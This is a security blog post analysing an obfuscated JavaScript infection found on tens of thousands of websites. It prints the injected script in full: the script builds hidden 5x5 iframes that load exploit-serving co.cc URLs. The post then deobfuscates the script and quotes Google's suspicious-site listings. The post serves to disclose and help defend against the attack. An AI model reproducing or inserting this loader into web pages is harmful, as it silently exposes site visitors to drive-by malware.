The latest website infection

Leave a reply

We’re seeing more and more obfuscated javascript infections recently.

The latest one:


y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';
fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';
u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat
(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var
ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute
('height','5');ov.setAttribute('style','display:none');ov.setAttribute
(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';
bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';
lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';
pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat
(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);
bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');
bo.setAttribute(kx,dv);document.body.appendChild(bo);

deobfuscates to:

iframe setAttribute src = hxxp: //prw1.co.cc/forum.php?tp=74220a5e554afea7

and:

iframe setAttribute src = hxxp://pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4

Which are listed as suspicious by Google:

What is the current listing status for prw1.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 5 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-09, and the last time suspicious content was found on this site was on 2011-04-08.
Malicious software includes 440 scripting exploit(s).

and…

What is the current listing status for pzl3.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-27, and the last time suspicious content was found on this site was on 2011-04-27.
Malicious software includes 334 scripting exploit(s).

In gathering data and searching for the source of the vulnerability that leads to this infection on websites (now totaling about 38,500), there is no common denominator with the infected websites.

It doesn’t appear to be WordPress or Joomla or osCommerce or any of the other popular website packages.

It might be more stolen FTP login credentials.

If you have further information on this, please post here, or email me at traef@wewatchyourwebsite.com.

Thank you.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>